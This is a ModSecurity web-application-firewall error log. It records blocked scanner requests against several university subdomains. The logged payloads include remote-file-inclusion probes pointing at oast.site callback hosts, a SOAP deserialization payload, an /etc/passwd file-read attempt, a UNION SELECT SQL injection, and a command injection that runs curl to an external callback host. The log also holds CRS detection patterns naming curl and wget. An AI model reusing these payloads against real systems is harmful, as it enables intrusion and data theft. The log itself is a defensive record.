[Tue Aug 29 11:33:13.346561 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlg8rj7dz6oimpo1.oast.site found within TX:1: cjmn8l5jmimk2adbbnlg8rj7dz6oimpo1.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO11CcCo-f0AAARdiHIAAAAK"]
[Tue Aug 29 11:33:13.356008 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlg763gp4qtu7mi4.oast.site found within TX:1: cjmn8l5jmimk2adbbnlg763gp4qtu7mi4.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO11CcCo-f0AAARR27YAAAAF"]
[Tue Aug 29 11:33:13.363445 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgnmrwuo49jy8on.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgnmrwuo49jy8on.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO11CcCo-f0AAARTEMUAAAAG"]
[Tue Aug 29 11:33:13.365327 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlge6wb19jrfr7n3.oast.site found within TX:1: cjmn8l5jmimk2adbbnlge6wb19jrfr7n3.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO11CcCo-f0AAARQ37IAAAAB"]
[Tue Aug 29 11:33:13.365413 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgyeybwjzho7dds.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgyeybwjzho7dds.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO11CcCo-f0AAARD1ToAAAAH"]
[Tue Aug 29 11:33:13.379844 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlgmuzrytjg4jh6x.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgmuzrytjg4jh6x.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO11CcCo-f0AAARH7OIAAAAM"]
[Tue Aug 29 11:33:13.419143 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlg66pwpkhuzx1yq.oast.site found within TX:1: cjmn8l5jmimk2adbbnlg66pwpkhuzx1yq.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO11CcCo-f0AAARA7egAAAAA"]
[Tue Aug 29 11:33:13.460974 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlg6r1goma87a9yt.oast.site found within TX:1: cjmn8l5jmimk2adbbnlg6r1goma87a9yt.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO11CcCo-f0AAARTEMYAAAAG"]
[Tue Aug 29 11:33:13.503237 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgkeh4bracyp5wp.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgkeh4bracyp5wp.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO11CcCo-f0AAARNk9cAAAAS"]
[Tue Aug 29 11:33:14.384420 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:stagingTaskData. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /\\x22>\\x0a  < found within ARGS:stagingTaskData: <SOAP-ENV:Envelope xmlns:xsi=\\x22http://www.w3.org/2001/XMLSchema-instance\\x22 xmlns:xsd=\\x22http://www.w3.org/2001/XMLSchema\\x22 xmlns:SOAP-ENC=\\x22http://schemas.xmlsoap.org/soap/encoding/\\x22 xmlns:SOAP-ENV=\\x22http://schemas.xmlsoap.org/soap/envelope/\\x22 xmlns:clr=\\x22http://schemas.microsoft.com/soap/encoding/clr/1.0\\x22 SOAP-ENV:encodingStyle=\\x22http://schemas.xmlsoap.org/soap/encoding/\\x22>\\x0a  <SOAP-ENV:Body>\\x0a    <a1:WindowsIden..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData"] [unique_id "ZO11CsCo-f0AAARdiHMAAAAK"]
[Tue Aug 29 11:33:14.385085 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:stagingTaskData. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /\\x22>\\x0a  < found within ARGS:stagingTaskData: <SOAP-ENV:Envelope xmlns:xsi=\\x22http://www.w3.org/2001/XMLSchema-instance\\x22 xmlns:xsd=\\x22http://www.w3.org/2001/XMLSchema\\x22 xmlns:SOAP-ENC=\\x22http://schemas.xmlsoap.org/soap/encoding/\\x22 xmlns:SOAP-ENV=\\x22http://schemas.xmlsoap.org/soap/envelope/\\x22 xmlns:clr=\\x22http://schemas.microsoft.com/soap/encoding/clr/1.0\\x22 SOAP-ENV:encodingStyle=\\x22http://schemas.xmlsoap.org/soap/encoding/\\x22>\\x0a  <SOAP-ENV:Body>\\x0a    <a1:WindowsIden..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData"] [unique_id "ZO11CsCo-f0AAARTEMcAAAAG"]
[Tue Aug 29 11:33:14.388039 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:stagingTaskData. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /\\x22>\\x0a  < found within ARGS:stagingTaskData: <SOAP-ENV:Envelope xmlns:xsi=\\x22http://www.w3.org/2001/XMLSchema-instance\\x22 xmlns:xsd=\\x22http://www.w3.org/2001/XMLSchema\\x22 xmlns:SOAP-ENC=\\x22http://schemas.xmlsoap.org/soap/encoding/\\x22 xmlns:SOAP-ENV=\\x22http://schemas.xmlsoap.org/soap/envelope/\\x22 xmlns:clr=\\x22http://schemas.microsoft.com/soap/encoding/clr/1.0\\x22 SOAP-ENV:encodingStyle=\\x22http://schemas.xmlsoap.org/soap/encoding/\\x22>\\x0a  <SOAP-ENV:Body>\\x0a    <a1:WindowsIden..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData"] [unique_id "ZO11CsCo-f0AAARA7ekAAAAA"]
[Tue Aug 29 11:33:14.388332 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:stagingTaskData. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /\\x22>\\x0a  < found within ARGS:stagingTaskData: <SOAP-ENV:Envelope xmlns:xsi=\\x22http://www.w3.org/2001/XMLSchema-instance\\x22 xmlns:xsd=\\x22http://www.w3.org/2001/XMLSchema\\x22 xmlns:SOAP-ENC=\\x22http://schemas.xmlsoap.org/soap/encoding/\\x22 xmlns:SOAP-ENV=\\x22http://schemas.xmlsoap.org/soap/envelope/\\x22 xmlns:clr=\\x22http://schemas.microsoft.com/soap/encoding/clr/1.0\\x22 SOAP-ENV:encodingStyle=\\x22http://schemas.xmlsoap.org/soap/encoding/\\x22>\\x0a  <SOAP-ENV:Body>\\x0a    <a1:WindowsIden..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData"] [unique_id "ZO11CsCo-f0AAARD1TsAAAAH"]
[Tue Aug 29 11:33:14.391310 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:stagingTaskData. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /\\x22>\\x0a  < found within ARGS:stagingTaskData: <SOAP-ENV:Envelope xmlns:xsi=\\x22http://www.w3.org/2001/XMLSchema-instance\\x22 xmlns:xsd=\\x22http://www.w3.org/2001/XMLSchema\\x22 xmlns:SOAP-ENC=\\x22http://schemas.xmlsoap.org/soap/encoding/\\x22 xmlns:SOAP-ENV=\\x22http://schemas.xmlsoap.org/soap/envelope/\\x22 xmlns:clr=\\x22http://schemas.microsoft.com/soap/encoding/clr/1.0\\x22 SOAP-ENV:encodingStyle=\\x22http://schemas.xmlsoap.org/soap/encoding/\\x22>\\x0a  <SOAP-ENV:Body>\\x0a    <a1:WindowsIden..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData"] [unique_id "ZO11CsCo-f0AAARH7OMAAAAM"]
[Tue Aug 29 11:33:14.420121 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:stagingTaskData. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /\\x22>\\x0a  < found within ARGS:stagingTaskData: <SOAP-ENV:Envelope xmlns:xsi=\\x22http://www.w3.org/2001/XMLSchema-instance\\x22 xmlns:xsd=\\x22http://www.w3.org/2001/XMLSchema\\x22 xmlns:SOAP-ENC=\\x22http://schemas.xmlsoap.org/soap/encoding/\\x22 xmlns:SOAP-ENV=\\x22http://schemas.xmlsoap.org/soap/envelope/\\x22 xmlns:clr=\\x22http://schemas.microsoft.com/soap/encoding/clr/1.0\\x22 SOAP-ENV:encodingStyle=\\x22http://schemas.xmlsoap.org/soap/encoding/\\x22>\\x0a  <SOAP-ENV:Body>\\x0a    <a1:WindowsIden..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData"] [unique_id "ZO11CsCo-f0AAARD1TwAAAAH"]
[Tue Aug 29 11:33:14.452505 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:inUrl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:inUrl: file///etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/wavemaker/studioService.download"] [unique_id "ZO11CsCo-f0AAARR27gAAAAF"]
[Tue Aug 29 11:33:14.460428 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:inUrl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:inUrl: file///etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/wavemaker/studioService.download"] [unique_id "ZO11CsCo-f0AAARD1T0AAAAH"]
[Tue Aug 29 11:33:14.460818 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:inUrl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:inUrl: file///etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/wavemaker/studioService.download"] [unique_id "ZO11CsCo-f0AAARH7OQAAAAM"]
[Tue Aug 29 11:33:14.461649 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:inUrl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:inUrl: file///etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wavemaker/studioService.download"] [unique_id "ZO11CsCo-f0AAANsAdMAAAAD"]
[Tue Aug 29 11:33:14.479185 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:inUrl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:inUrl: file///etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/wavemaker/studioService.download"] [unique_id "ZO11CsCo-f0AAARNk9oAAAAS"]
[Tue Aug 29 11:33:14.506841 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:inUrl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:inUrl: file///etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/wavemaker/studioService.download"] [unique_id "ZO11CsCo-f0AAARD1T4AAAAH"]
[Tue Aug 29 11:33:14.562610 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/compliancepolicyelements.inc.php"] [unique_id "ZO11CsCo-f0AAARTEMsAAAAG"]
[Tue Aug 29 11:33:14.564002 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/compliancepolicyelements.inc.php"] [unique_id "ZO11CsCo-f0AAAQKOi8AAAAs"]
[Tue Aug 29 11:33:14.564560 2023] [:error] [pid 1112] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/compliancepolicyelements.inc.php"] [unique_id "ZO11CsCo-f0AAARYxDcAAAAJ"]
[Tue Aug 29 11:33:14.566648 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/compliancepolicyelements.inc.php"] [unique_id "ZO11CsCo-f0AAARNk9wAAAAS"]
[Tue Aug 29 11:33:14.582838 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/compliancepolicyelements.inc.php"] [unique_id "ZO11CsCo-f0AAARTEMwAAAAG"]
[Tue Aug 29 11:33:14.603713 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:searchField. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:searchField: antani' union select (select concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d) limit 0,1),NULL,NULL,NULL,NULL -- "] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/compliancepolicyelements.inc.php"] [unique_id "ZO11CsCo-f0AAARR27oAAAAF"]
[Tue Aug 29 11:33:15.998940 2023] [:error] [pid 1119] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:jk. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:jk: pyimport os;os.system(\\x22curl cjmn8l5jmimk2adbbnlgzokhgmrz566gw.oast.site\\x22);f=function f2(){};"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/flash/addcrypted2"] [unique_id "ZO11C8Co-f0AAARfwi8AAAAI"]
[Tue Aug 29 11:33:16.345038 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:jk. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:jk: pyimport os;os.system(\\x22curl cjmn8l5jmimk2adbbnlgfgifmtxfcrhoq.oast.site\\x22);f=function f2(){};"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/flash/addcrypted2"] [unique_id "ZO11DMCo-f0AAARR28MAAAAF"]
[Tue Aug 29 11:33:17.990087 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:jk. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:jk: pyimport os;os.system(\\x22curl cjmn8l5jmimk2adbbnlgd9qxe5w3gs67s.oast.site\\x22);f=function f2(){};"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/flash/addcrypted2"] [unique_id "ZO11DcCo-f0AAARo8wcAAAAT"]
